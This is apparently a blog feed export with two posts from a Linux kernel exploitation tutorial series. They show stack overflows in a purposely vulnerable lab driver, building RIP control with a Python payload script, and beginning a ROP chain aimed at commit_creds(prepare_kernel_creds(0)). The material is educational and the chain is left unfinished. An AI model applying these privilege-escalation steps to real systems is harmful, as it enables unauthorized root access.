tag:blogger.com,1999:blog-58456713138679062742024-03-12T16:29:51.594-07:00k3170"So you are interpreters of interpreters?" - Socrates, Ion by PlatoKeith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.comBlogger100125tag:blogger.com,1999:blog-5845671313867906274.post-14957687828966403312021-01-18T06:04:00.003-08:002021-01-18T06:05:51.531-08:00[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow<p><b>Previous Post in Series</b>:<br /></p><ol><li><b>[Linux Kernel Exploitation 0x0]</b> Debugging the Kernel with QEMU <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html</a></li><li><b>[Linux Kernel Exploitation 0x1] </b>Smashing Stack Overflows in the Kernel <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.htm">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.htm</a>l</li><li>this post <br /></li></ol><div>Hi folks! I'm back and this time I've got a banger of a post; we're going to finish off the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and looked at what a few probes around some of the memory structures looked like. If you don't know how to debug a Linux Kernel, build one or build a Qemu image please check out the previous stuff in the series. In this post we're going to start really wielding our power over the stack and craft ROP chains and calls to some interesting functions.</div><div><br /></div><h2 style="text-align: left;">Controlling EIP (No Canary)<br /></h2><div><br /></div><div>Target Driver: <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c</a> <br /></div><div><br /></div><div>So the last time we discussed about canaries we turned off <span style="font-family: courier;">CONFIG_STACKPROTECTOR </span>and looked at the stack to confirm there was absolutely no protection. What I did after that and behind the scenes was check out if <span style="font-family: courier;">VMAP_STACK </span>has any significant impact, this is because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver, basically changed <span style="font-family: courier;">target_buf </span>to a finite sized char buffer "<span style="font-family: courier;">char target[16]</span>". This seemed to smooth my stack smashing success. So I again implore you to use the target driver for our following set of examples.</div><div> </div><div>First lets find the length at which we start overwriting the return address or register that ends up in RIP. This is not the best explanation but to keep things simple my procedure was: <i>To increase my write length 1 byte at a time, check the kind of error triggered and then set a taint value like <span style="font-family: courier;">0x43434343 </span>at the end of my payload to see if it ends up in any registers or interesting places when a fault is triggered. </i></div><div> </div><div>Eventually this laborious process yielded a length of 48 characters before I could perfectly overwrite the RIP value, to demonstrate check out this nifty screenshot:</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHTcLryIDMRtNf7aS4sO9o2-pMMjUAZm_ZCvHx4mW7-RLu63wJuRJv0MTLksADdun8aj_N65yKWppvh55jGnMM1eyEf8B4gWtHfrBt1iDcuP7oFLApbb8Cym2k11g9oUiYLcLaZym7Ss/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="404" data-original-width="1358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwHTcLryIDMRtNf7aS4sO9o2-pMMjUAZm_ZCvHx4mW7-RLu63wJuRJv0MTLksADdun8aj_N65yKWppvh55jGnMM1eyEf8B4gWtHfrBt1iDcuP7oFLApbb8Cym2k11g9oUiYLcLaZym7Ss/s16000/RIP_Control-2020-11-29+00-40-11.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">GDB output showing that an address from our payload is actually executed in the kernel! We officially control execution woo hoo!<br /></td></tr></tbody></table><br /><br /></div><div>For those who want to recreate this using the stuff I setup for the test, you'll need to fire off these commands---making sure you're module is loaded and accessible:</div><div><br /></div><div><span style="font-family: courier;">./stacksmash_test_addr.sh 48 [address to execute]</span></div><div><br /></div><div>and if you want to see what ./stacksmash_test_addr.sh does, its very simple, it basically just takes a payload length and a hexadecimal address as input and it spits out a string that we can use as a payload, here's the code:</div><div><br /></div><div><code> <span style="font-size: small;"><span style="font-family: courier;">./stacksmash_app.elf <span class="sb">`</span>python <span class="nt">-c</span> <span class="s1">'\</span></span></span></code></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">import sys;</span></code></span></span></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">address=sys.argv[2];</span></code></span></span></div><div><span style="font-size: small;"><span style="font-family: courier;"><code><span class="s1">address_string="".join([chr(int(address[2:][i:i+2],16)) for i in range(0,len(address[2:])+2,2) if len(address[2:][i:i+2]) != 0][::-1]);print("A"*int(sys.argv[1])+address_string)'</span> <span class="nv">$LENGTH</span> <span class="nv">$ADDR</span><span class="sb">`</span> 10</code></span></span></div><div><br /></div><div><i>I've tried to clean it up a bit but honestly all I'm doing here is trying some ugly python to convert a hexadecimal address into a format that ends up in memory properly. Its not crucial to understand everything that happens here because there are much much less complicated ways to achieve this, I'm just trying to go through the most straightforward way as possible so everyone can participate without requiring much background in kernel dev. </i><br /></div><div><br /></div><div>In the above screenshot one should note that the breakpoint is set for a weird enough function that we know we are triggering execution---<i>beacause it may happen that you get all happy about triggering a ROP payload when its just natural kernel noise hehe</i>. Congratulations you just controlled execution at one of the highest privilege levels available to a human being---<i>on a Linux computer</i>! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want. <br /></div><div><br /></div><div><h2 style="text-align: left;">Privilege Escalation for Kernel Intruders<br /></h2></div><div><br /></div><div>Before we do that lets layout a game plan. There are any number of things we can do with these new gained kernel powers but lets try something simple, get root creds. So what we need to do is get the kernel to make our userland process insta-root! It turns out there are functions loaded into the kernel symbol table that literally do that:</div><div><ul style="text-align: left;"><li><span style="font-family: courier;"><a href="https://elixir.bootlin.com/linux/latest/source/kernel/cred.c#L666">prepare_kernel_creds(struct task_struct *daemon)</a></span> is a function that generates a <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/cred.h#L111">cred </a>structure. We need this for our call to the next important function. I know it takes a weird <span style="font-family: courier;">task_struct </span>thing but fret not, the documentation indicates that this can be NULL, which will essentially trigger some default option that gives us "full creds".</li><li><span style="font-family: courier;"><a href="https://elixir.bootlin.com/linux/latest/source/kernel/cred.c#L423">commit_creds(struct cred *)</a></span> this function does the actual deed and installs the cred structure to our task.</li></ul><div>So we need some Return Oriented Programing (ROP) chain that puts together a call like this <span style="font-family: courier;">commit_creds(prepare_kernel_creds(0))</span>, which means in terms of assembler instructions, we need:</div></div><div><ul style="text-align: left;"><li>an instruction chain that puts a null in <span style="font-family: courier;">rdi </span>before we call <span style="font-family: courier;">prepare_kernel_creds</span>. This is because according to calling convention <span style="font-family: courier;">rdi <span style="font-family: inherit;"></span></span>holds the first parameter.</li><li>an instruction chain that grabs the returned cred structure---<i>which will be a pointer in <span style="font-family: courier;">rax </span>at this point</i>---, and sticks it in <span style="font-family: courier;">rdi </span>before our call to <span style="font-family: courier;">commit_creds</span></li></ul><div>Beyond this there's also the problem of leaving the realm of the kernel to enjoy your new found powers in middle earth. Luckily for us there's a couple methods one can use to leave, each of them requiring something different of the stack and register value set. </div><div> </div><div>We'll address this after our ROP chain is almost complete, so in summary, our plan so far is:</div><div><ol style="text-align: left;"><li><b>RIP Control:</b> Find a write length that controls the RIP <br /></li><li><b>ROP Chain:</b> Build a ROP Chain that calls <span style="font-family: courier;">commit_creds(prepare_kernel_creds(0))</span></li><li><b>Return2Userland:</b> Exit the kernel safely using iretq, sysexit, etc <br /></li></ol></div><div>Our overall plan will vary slightly depending on the protections available in the stack for now lets keep it simple. <br /></div><div style="text-align: left;"><h2 style="text-align: left;">Building a ROP chain</h2></div><div> </div><div>We need a tool that will compile some ROP friendly instructions. I relied on <a href="https://github.com/JonathanSalwan/ROPgadget"><span style="font-family: courier;">ROPGadget.py</span></a> it seems to get the job done although I'm sure there are tons of tools that will be able to handle this. Here's me dumping ROP gadgets for the kernel im attacking here (which is the Linux 5.9.1):</div><div><br /></div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2R2kiaXvJ7tIhFwbmxC9__kW84lvFX3QyMlpvEwCYhHR6mUX_jWqrUFD3TnTYgcP0njPicUad8ECkKefNrjx5VwtsjSk2V3rzltX0oGW6lo4pnlMXdh0F9G4HbA3jp1nezKncbWY6Ub4/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="207" data-original-width="927" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2R2kiaXvJ7tIhFwbmxC9__kW84lvFX3QyMlpvEwCYhHR6mUX_jWqrUFD3TnTYgcP0njPicUad8ECkKefNrjx5VwtsjSk2V3rzltX0oGW6lo4pnlMXdh0F9G4HbA3jp1nezKncbWY6Ub4/s16000/Screenshot+from+2020-12-01+02-47-48.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Screenshot of some ROPGadget.py output after being run on the vmlinux image for our target Kernel.<br /></td></tr></tbody></table><br /><br /></div><div>Okay so we needed to pick up a couple gadgets. To start lets setup a little gadget to call any function pointer on the stack, here are my candidates:</div><div><ul style="text-align: left;"><li><span style="font-family: courier;">0xffffffff8124529d <b>pop rbx ; ret</b><br /></span></li><li><span style="font-family: courier;">0xffffffff8230f2ff <b>call rbx</b> </span></li></ul><p>Using these gadgets means we essentially want to pop something into rbx, this requires us to then have somethin on the stack; for us this means packing in an address to the <span style="font-family: courier;">prepare_kernel_creds </span>call, which would look like this basically: </p><p><span style="font-family: courier;">[AAA...*48][</span><span style="font-family: courier;">0xffffffff8124529d][</span><span style="font-family: courier;">prepare_kernel_creds][</span><span style="font-family: courier;">0x</span><span style="font-family: courier;"><span style="font-family: courier;">ffffffff8230f2ff</span>]</span></p>Okay so we need to somehow use <span style="font-family: courier;">./stacksmash_test_addr.sh</span> to pack two addresses into the payload, I've tried more sophisticated ways and they are currently failing so I've decided to stick with this clunky script for now. Anyway here's how you stuff more than one address into the payload, call <span style="font-family: courier;">stacksmash_test_add.sh</span> as follows:</div><div> </div><div><span style="font-family: courier;">./stacksmash_test_addr.sh 48 </span><span style="font-family: courier;"><span style="font-family: courier;">0x</span></span><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;">ffffffff8230f2ff</span>ffffffff81088be0</span></span><span style="font-family: courier;">ffffffff8124529d</span></div><div></div><div></div><div> </div><div>This is going to prove a little tricky because of the default terminal line size on qemu which I haven't figured out how to change yet--I'll update this once i do! Anyway if you get this write what should end up on your stack is the following:</div><div> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihhll3z8woIM5O4WGl42DpmaRe96WfaGb4U9VWpuRtdkhKX7kLJ5IT7JUiqgXnxVC-jFzUFgyvlHN14ofZndwXgQDWvPmXMUb-ACVaiLvbUz1lVJWMKeY3ze8CrVMYdbvPpT-fKogx1d8/s704/stacksmash_test_addr-confirmed-payload.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="704" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihhll3z8woIM5O4WGl42DpmaRe96WfaGb4U9VWpuRtdkhKX7kLJ5IT7JUiqgXnxVC-jFzUFgyvlHN14ofZndwXgQDWvPmXMUb-ACVaiLvbUz1lVJWMKeY3ze8CrVMYdbvPpT-fKogx1d8/s16000/stacksmash_test_addr-confirmed-payload.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some gdb output confirming we actually are building a sane payload. Here I just grab the address the buf parameter from a kernel mediated call to vfs_write, this helps me make sure I'm looking at the correct buffer, before the driver touches it.<br /></td></tr></tbody></table><div><br /></div><div><p>And if you manage to actually run the sample payload here you should hit breakpoints that indicate you're in control:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfCMY75yDpGrSeThIamSACpuuya5gv6qXO9EcpvJy8EFOP6HLW46-MFHWiEhhblShiYTkuXe_pWr23KtlUBEQQE88cB_4WFuiiKo9ISRH7xF2QuQKSReN9tmRp8qDCTg6hjRQt0KD8GJY/s811/stacksmash_test_addr-confirmed-breakpoints.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="811" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfCMY75yDpGrSeThIamSACpuuya5gv6qXO9EcpvJy8EFOP6HLW46-MFHWiEhhblShiYTkuXe_pWr23KtlUBEQQE88cB_4WFuiiKo9ISRH7xF2QuQKSReN9tmRp8qDCTg6hjRQt0KD8GJY/s16000/stacksmash_test_addr-confirmed-breakpoints.png" /></a></div><br /><p></p><p>That confirms that we are hitting the right notes and we can pretty much call any function now with this neat little gadget! What we need to do now is prepare a ROP chain to stick a NULL in <span style="font-family: courier;">rdi </span>before we make the call to <span style="font-family: courier;">preapre_kernel_cred</span>. <i>And just a note when choosing gadgets I would prioritize those that cause the least stack drama---some ret instructions specify an offset with which to bump the return address so watch out---, affect as little registers as possible. But I suggest just trying stuff, you actually learn a lot from seeing gadgets not work!</i></p><p><i> </i></p><p>I've been stuck at this point for a few weeks so I'm going to cut my losses with this post and end it here we'll prepare the rest of the payload in the next post. Enjoy! <i> <br /></i></p><br /></div></div><h2 style="text-align: left;">Reading and References</h2><div><ul style="text-align: left;"><li><a href="https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example/">https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example/</a> </li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-1/</a></li><li><a href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/">https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/linux-kernel-rop-ropping-your-way-to-part-2/</a></li><li><a href="https://www.felixcloutier.com/x86/iret:iretd">https://www.felixcloutier.com/x86/iret:iretd</a></li><li><a href="https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example/">https://memto.github.io/linux/program/2018/09/21/linux-kernel-rop-example</a>/</li></ul></div><div><br /></div><div><br /></div><p></p>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com1tag:blogger.com,1999:blog-5845671313867906274.post-83557821615199324892020-11-27T07:29:00.006-08:002020-11-28T04:47:12.729-08:00[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel <div class="separator" style="clear: both; text-align: center;"><br /></div><p><b>Previous Post in Series</b>:<br /></p><ol style="text-align: left;"><li>[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU <a href="https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html">https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html</a> </li></ol><p>Hi folks this blog post is part of a series in which I'm running through some of the basics when it comes to kernel exploit development for Linux. I've started off the series with a walk through of how to setup your kernel for debugging and included a simple debug driver to target. The post here carries on from this point and explores some stack security paradigms in the kernel.</p><p>We're gonna add some stuff to that driver to make it do a dangerous memcpy and then look at whether we can manipulate memory structures with our input. I initially intended to cover full exploit to a root shell with this post but that proved a bit more challenging than I anticipated so I'm splitting this up into two posts. This one will cover almost everything right up to actually controlling the instruction pointer in the kernel and cover a good amount of detail on kernel memory protections for the stack and how they work. So if you'd like to learn more about that stay tuned! <br /></p><p> </p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgmwKOqV2XLZZukfFmx8o5G_StYNgaribd7q-yjs8YG4WcE5nSj8LULKQMPWp8MbCO4JmDwiivGhSQ7-GEaO0N8kc_gCUxf2McrEvzmFdG8E71Up0-WavUMdJA5OCAQodvo2k-_N8jFQ/s1848/stackcrash_ssh.gif" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1016" data-original-width="1848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTgmwKOqV2XLZZukfFmx8o5G_StYNgaribd7q-yjs8YG4WcE5nSj8LULKQMPWp8MbCO4JmDwiivGhSQ7-GEaO0N8kc_gCUxf2McrEvzmFdG8E71Up0-WavUMdJA5OCAQodvo2k-_N8jFQ/s16000/stackcrash_ssh.gif" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">gif
showing the correlation between crashes that trigger a kernel fault
(everytime ssh connects). One can see the register data includes our
payload!This was actually a heap overflow not a stack based overflow
oops!<br /></td></tr></tbody></table><p> </p><h2 style="text-align: left;">Getting Setup<br /></h2><p>We're going to progress through this just like any other stack smashing tutorial. I'm going show you some vulnerable code, then we're going to experiment with some payload lengths until we get a crash and take it from there. </p><p> To do that we need to make sure we can actually trigger the vulnerable code and that means:</p><ol style="text-align: left;"><li>Having <b>a driver</b> script--<i>that invokes the kernel functionality from userspace</i>.<br /></li><li>Having a <b>kernel hooked </b>up to a debugger in a relaunch-able vm with debug symbols and all the other configs we need - <i>I explain how to achieve this in the previous post</i>.</li><li>Having enough <b>GDB fu </b>to: (1) set a breakpoint, (2) inspect the stack and register values. If you want to follow along like a champ I suggest pausing here and trying to get that done, learn to do those two things and then move on it.</li></ol><p><i>*In the next few paragraphs I show you how to set a breakpoint in the
kernel and inspect stack memory, because I lost this copy of the driver
and I don't want to make multiple copies of the same code please treat
these as tutorials for demonstration and try to recreate them on the
version of the driver that wasn't lost.</i> <br /></p><p>Okay so if that's in place, we can setup our debugger just as we did in the previous post except we want a setup this time that is going to allow us to inspect the stack so we can actually see what our input is doing to memory. To achieve this we need to first hit the write functions, then look for a more precise breakpoint location so we can conveniently just peek at the stack without too much effort. Lets start with a break-point set for the beginning of the device write function---<i>the one that does that dangerous copy_from_user*</i>---, for us that's called <span style="font-family: courier;">stacksmash_dev_write</span>, here's a quick reminder of how to get that going:</p><p> </p><p style="text-align: left;"><span style="font-family: courier;">root@syskaller: <b>cat /proc/modules</b> <i>[grab base address]</i> </span><span style="font-family: courier;"> </span></p><p style="text-align: left;"><span style="font-family: courier;">(gdb) <b>add-symbol-file </b><i>[PATH]</i><b>stacksmash_driver.ko</b> </span><i><span style="font-family: courier;">[base]</span></i><span style="font-family: courier;"> </span></p><p style="text-align: left;"><span style="font-family: courier;">(gdb) <b>break stacksmash_dev_write</b></span><br /></p><div><div><p> <span></span><span><span></span><span></span><span></span><span style="font-family: courier;">Breakpoint 2 at 0x10: stacksmash_dev_write. (2 locations)</span></span></p><p><span><span style="font-family: courier;"> </span></span></p><p>For those who need the recap "add-symbol-file" imports symbols from a specified object file, this is done so we have more semantic information while debugging<i>. </i>Next we set a simple breakpoint at <span style="font-family: courier;">stacksmash_dev_write</span>. <br /><i></i></p><p><i>* in case you haven't read the code or don't know what the module does, its a pretty straightforward ioctl module with a write and read operation. Its based on the driver used in the previous post the only difference is the write does a copy_to_user into a stack buffer without checking the incoming length.</i></p><p>Cool now we need to trigger the function, to do that we need to invoke the stacksmash_app.elf binary from our qemu target. So we ssh in to the instance, build the app elf and launch as follows:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$ cd [kernel_dir]/image/; ssh -v -i ./stretch.id_rsa -p 10021 root@localhost -o "StrictHostKeyChecking no"</span></p><p><span style="font-family: courier;">... </span><br /></p><p><span style="font-family: courier;">root@syskaller: cd /home/</span><br /><span style="font-family: courier;"><span style="font-family: courier;">root@syskaller: gcc -o stacksmash_app.elf stacksmash_app.c root@syskaller: insmod stacksmash_driver.ko</span></span><br /><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;">root@syskaller: ./stacksmash_app.elf "aaaaaaaa" 10</span></span></span></span></p><p><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"><span style="font-family: courier;"> </span></span></span></span></p><p>If all is well you should hit a breakpoint like so:</p><p><span style="font-family: courier;">(gdb) c<br />Continuing.<br /><br /><b>Thread 1 hit Breakpoint 2, stacksmash_dev_write </b>(filep=0xffff88806bc30640, <br /> buffer=0x9 <fixed_percpu_data+9> <error: Cannot access memory at address 0x9>, <br /> len=140726537215640, offset=0xffffc9000049feb8)<br /> at drivers/stacksmash//stacksmash_driver.c:96<br /></span><br /></p><p>Which means we are in a comfortable position to track down better breakpoints now. </p><p> </p><p>To find a breakpoint we disassemble the <span style="font-family: courier;">stacksmash_dev_write</span> function:</p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9WRiTvKnIYULMExQpWWMj7vxCiRs8uptSfLLfwY3lMqg7EWY8iJTh_CEtvTyURxqu1ql1tls5IKuHsR8hLWb8Cl7tqML1-3X0eFtjs_LLVVLsIiITUP0NeTHww_xCB3__rE-mcNNkCG8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="340" data-original-width="862" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9WRiTvKnIYULMExQpWWMj7vxCiRs8uptSfLLfwY3lMqg7EWY8iJTh_CEtvTyURxqu1ql1tls5IKuHsR8hLWb8Cl7tqML1-3X0eFtjs_LLVVLsIiITUP0NeTHww_xCB3__rE-mcNNkCG8/s16000/Screenshot+from+2020-11-12+04-37-59.png" /></a></div><br /><br /></div><br /><p></p><p>At offsets <span style="font-family: courier;">0xffffffffa0000030</span> to <span style="font-family: courier;">0xffffffffa0000039</span> we can see the driver prepping the arguments for <span style="font-family: courier;">copy_from_user</span>, leaving us with:</p><ul style="text-align: left;"><li><span style="font-family: courier;">rdx</span> holding the size</li><li><span style="font-family: courier;">rsi</span> holding the source (our arg string of "a"'s)</li><li><span style="font-family: courier;">rdi</span> holding the destination<br /></li></ul><p>We choose some new breakpoints and set em just before the
<span style="font-family: courier;">copy_from_user</span> call and one just after, we don this so we can peek at
the stack and find out how much damage the input did. To peek we are checking the address that <span style="font-family: courier;">rdi</span> points to before and after the <span style="font-family: courier;">copy_from_user</span> call:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVp-w5v-SVppWjtijEnN39MV3FBOxXi7ZkR1oQJFH1BELqJOx1GdgEYpZRPY0ZZWpLjkoHsl45-XuUcQSd0N-FrgEF_ZzDbD2UxCszIDC5UzO7TyMDbZNiLVtnQQiJItfYsNyaPtLi8Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="756" data-original-width="924" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVp-w5v-SVppWjtijEnN39MV3FBOxXi7ZkR1oQJFH1BELqJOx1GdgEYpZRPY0ZZWpLjkoHsl45-XuUcQSd0N-FrgEF_ZzDbD2UxCszIDC5UzO7TyMDbZNiLVtnQQiJItfYsNyaPtLi8Q/s16000/Screenshot+from+2020-11-12+04-41-25.png" /></a></div><br /><p></p>Okay we have full view of what we're doing here, this is good. Now before we can start building exploits lets talk about some of the Linux Kernel's security protections for stack memory and then check which one's we have enabled, see how they work and craft an exploit around this. </div><div> </div><div><i>*Also please note we're going to swap this driver out for another one that is again slightly modified to make exploitation a bit easier, here I made the mistake of not actually involving any stack variables! So please take this as a quick lesson in GDB foo and debugging kernel drivers but if you'd like to follow on please switch to targeting this driver [<u>https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c</u>]. I hope this doesn't make it too hard to follow, I was also too lazy to re-do the screenshots hehe they came out so neat!<br /></i></div><div><br /></div><div style="text-align: left;"><h2>Kernel Stack Memory Protection</h2></div>Lets look at the stuff in the kernel making modern stack exploitation so difficult ---<i>I believe most of these are accessible via .config by appending <span style="font-family: courier;">CONFIG_ </span>to the name, and sing the <span style="font-family: courier;">./script/config</span> script</i>: <div><ul style="text-align: left;"><li><span style="font-family: courier;"><b>STACKPROTECTOR</b></span>: Exploiting a stack overflow requires writing past the end of a buffer into the pointers on the stack. The kernel adds stack canaries to be able to detect when the stack was corrupted. This option controls this but it depends on the config variables <span style="font-family: courier;">HAVE_STACKPROTECTOR</span>, which means you need to make sure that is off if you want this one off. <i>Another important thing to note is that this only tags functions when they "have an 8-byte or larger character array on the stack", which means there may be times a function doesn't get a stack protector in a equivalent stack write operation, or perhaps a stack write is imposed by a compiler optimization?</i><br /></li><li><span style="font-family: courier;"><b>STACKPROTECTOR_STRONG</b></span>: This option allows one to widen the heuristics used to add canaries to functions. If this is enabled canaries will be added to functions if they merely have any local variables in an assignment operation among others.<br /></li><li><span style="font-family: courier;"><b>INIT_STACK_NONE</b></span>: Given how easily one can leak info from uninitialized memory in the kernel i.e. <i>a module uses an uninitialized memory pointer during an IOCTL, doesn't clear it or set it but writes it back to the user---through some craftable call chain or invocation</i>. The problem is so common that there's a config option with sub-options for making sure __user marked variables used in kernel functions are initialized to 0. One can also mark heap objects like this. It obviously doesn't work out well for anyone making assumptions about non-null uninitialized values, but it certainly does solve a big problem. <br /></li><li><span style="font-family: courier;"><b>CONFIG_VMAP_STACK</b></span>: To help detect stack overflows the kernel community introduced something called a guard page---t<i>his whole technique is very similar to something called <a href="https://en.wikipedia.org/wiki/Shadow_memory#:~:text=Shadow%20memory%20is%20a%20technique,more%20bytes%20in%20main%20memory.">shadow memory</a></i> which is used to track memory behavior in static/dynamic analysis engines. This page with is allocated by the kernel after the end of the stack region whenever a process is spun up for execution---<i>the page triggers a seg fault when written to due to its page access rights</i>. After this folks figured out a way to skip over the guard page and make memory regions clash as they grow over each other. The method was first employed in an exploit famously known as Stack Clash developed by the folks at Qualys. To address this I believe <span style="font-family: courier;">VMAP_STACK </span>was developed in order to allow the kernel to map stack addresses to the range of virtual memory addresses used by vmalloc. Because vmalloc ranges are physically non-contiguous it meant wrapping guard pages around stack memory became a lot easier and guard pages became bigger so they are harder to skip over. </li></ul><div><br /></div></div><div>We're not going to be turning any of these off just yet, its important to know what the difficulties of exploitation are like in this state and then slowly remove protections to show how and why they work. Now that we know what a modern kernel stack looks like and what we need to dance around lets see if we can overwrite some structures in memory. </div><div><br /></div><div><h2 style="text-align: left;">Destroying Kernel Stack</h2><ul style="text-align: left;"><li><b>Driver: </b><a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c</a> <b> </b></li><li><b>Userspace App:</b> <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_app.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_app.c</a><br /></li></ul><p> </p><p>Okay now that we can write to memory lets try to make that write count, we need to change a small detail about our driver, namely now instead of just simply making a huge <span style="font-family: courier;">copy_from_user</span> it actually <span style="font-family: courier;">memcpy</span>'s the input string to a stack variable like so:</p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY2hOtUWmmPcbdwFyo_QMNOJtyDllgSO93a-31HbU0SCOFSCghO3eXHShYsSG-AL79GLKTDuTOgnatsDLEYnOk2yy_xRLsZv9QybWHV7VmlIfYlo4QRuvDEkPJZJ25m0qOLNavKpZ10p0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="377" data-original-width="1279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY2hOtUWmmPcbdwFyo_QMNOJtyDllgSO93a-31HbU0SCOFSCghO3eXHShYsSG-AL79GLKTDuTOgnatsDLEYnOk2yy_xRLsZv9QybWHV7VmlIfYlo4QRuvDEkPJZJ25m0qOLNavKpZ10p0/s16000/stacksmash_changes-2020-11-27+16-10-47.png" /></a></div> </div><p></p><p><i>Another important change to mention is that from here on out I turned off KASAN, which can be done by making sure CONFIG_KASAN is not set when you compile your kernel. The reason is pretty simple, KASAN is annoyingly sensitive with memory and triggers panics long before you can actually see what you're doing. </i></p><p>We now need to load up the driver as before but we set some breakpoints that wrap the <span style="font-family: courier;">memcpy</span> like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBv-Czcbs7Zzo4SYPAt3tfvRa3z2CE5sMLy6PStwWvCd7AIsr16QtpedtekD8bEpXw3umOHZxKjV42Fgr4z1Bojm9ynwc2Qhn67t5kdVFzduaSAOtj4vxdADcGwdg5jESObhvDkmdL5uA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="275" data-original-width="814" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBv-Czcbs7Zzo4SYPAt3tfvRa3z2CE5sMLy6PStwWvCd7AIsr16QtpedtekD8bEpXw3umOHZxKjV42Fgr4z1Bojm9ynwc2Qhn67t5kdVFzduaSAOtj4vxdADcGwdg5jESObhvDkmdL5uA/s16000/memcpy_breakpoint2020-11-27+01-36-36.png" /></a></div></div><div><i>*having done this a couple times now, i recommend actually only taking the breakpoint just after memcpy returns. This is more efficient if you know how to search through memory for the payload and other goodies.</i><br /><p></p><p>And if we write 17 bytes to the stack for instance we should see the following happen:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 